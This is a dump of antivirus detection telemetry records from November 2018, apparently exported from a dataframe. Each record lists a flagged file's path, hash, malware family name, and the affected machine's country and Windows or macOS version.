  Row(detection=Row(filename='avscan-20181102-050831-5018e6e3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050831-5018E6E3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061202-2f3fa371', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061202-2F3FA371', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054724-be2170f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054724-BE2170F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:47:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062100-6ff997e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062100-6FF997E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060224-d705f6c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060224-D705F6C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053610-2c6c3983', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053610-2C6C3983', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051839-ba230738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051839-BA230738', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:18:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062041-6470c9a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062041-6470C9A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052703-e67fe3be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052703-E67FE3BE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061906-2c1bca39', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061906-2C1BCA39', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052746-004a953f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052746-004A953F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054613-93cfd164', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054613-93CFD164', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062102-70ee7f50', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062102-70EE7F50', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055152-5dd85f8b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055152-5DD85F8B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054259-207becbe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054259-207BECBE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061843-1e6fe129', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061843-1E6FE129', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053026-5f910907', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053026-5F910907', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060642-708a15c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060642-708A15C3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060747-979fccd3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060747-979FCCD3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051706-830b2159', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051706-830B2159', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051231-deff8478', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051231-DEFF8478', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055429-bbd2377c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055429-BBD2377C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T00:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052414-821dabd9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052414-821DABD9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054858-f6688fed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054858-F6688FED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060743-94f5eb37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060743-94F5EB37', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062345-d24206f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062345-D24206F2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055446-c5c12ecc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055446-C5C12ECC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062125-7eaa2ed8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062125-7EAA2ED8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062218-9e42f12b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062218-9E42F12B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060139-bc03ed3e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060139-BC03ED3E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060719-86a47dc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060719-86A47DC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052055-0b4f7891', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052055-0B4F7891', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='815be852e3c74e568ce25f415cf9472f6506d96120fa4a10556505fe054b966d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:54:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T16:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052549-baac8035', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052549-BAAC8035', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051925-d5c760d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051925-D5C760D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054318-2ba7c301', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054318-2BA7C301', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052420-8557b1d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052420-8557B1D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:31:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060700-7b66bd47', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060700-7B66BD47', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054443-5e49b178', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054443-5E49B178', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ub 40.exe', filepath='D:\\ub 40.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T12:26:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:09:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpa apd.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\PROPOSAL LPA\\LPA APD\\LPA APD.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005222-cf5b28c5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2816e781\\AVSCAN-20181102-001608-8FA5C177\\AVSCAN-20181102-005222-CF5B28C5', filesize=280000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='140e47f1db1561d3d3a3ac40c64e74d8c3ea372024a8afda97338203a77fe1e4', metadata=Row(cmdline=None, country='LY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:52:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\WinSxS\\x86_microsoft-windows-d..b-standardcollector_31bf3856ad364e35_10.0.16299.15_none_f80fc00b2c3cec50\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:13:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120311-81fc4c37', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ce46a6d7\\AVSCAN-20181101-120252-7F980F3E\\AVSCAN-20181101-120311-81FC4C37', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:00:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setuparp.exe', filepath='\\\\Server-gold\\home\\SUPERMARKET\\NONFOOD\\NONFOOD [SIL&DJU]\\SILMI\\MISILSS EVENT\\Corel\\CORELDRAW GRAPHICS SUITE X7\\Setup\\SetupARP.exe', filesize=2652000, name='W32/Sality.AT.#M1.#R1'), hash='4cb7c731ae70c5c30918d5f22ed251e627af3be6dfe79691d1fe752c70f8dd54', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T03:14:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhbd8b', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHBD8B', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:41:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141924-01c08ec5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_bb904b13\\AVSCAN-20181101-141541-D9A26E4C\\AVSCAN-20181101-141924-01C08EC5', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:19:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T01:45:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T18:18:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adorage.dll', filepath='\\\\?\\C:\\Program Files\\CyberLink\\Shared Files\\PlugIn\\proDAD\\adorage.dll', filesize=1920000, name='W32/Ramnit.CD.#M1.#R1'), hash='0f1aadc40295db58302849cfe1f06bbee568c045c4997fa7ac177fd19f928106', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:17:38Z'), dt=datetime.date(2018, 11, 1)),
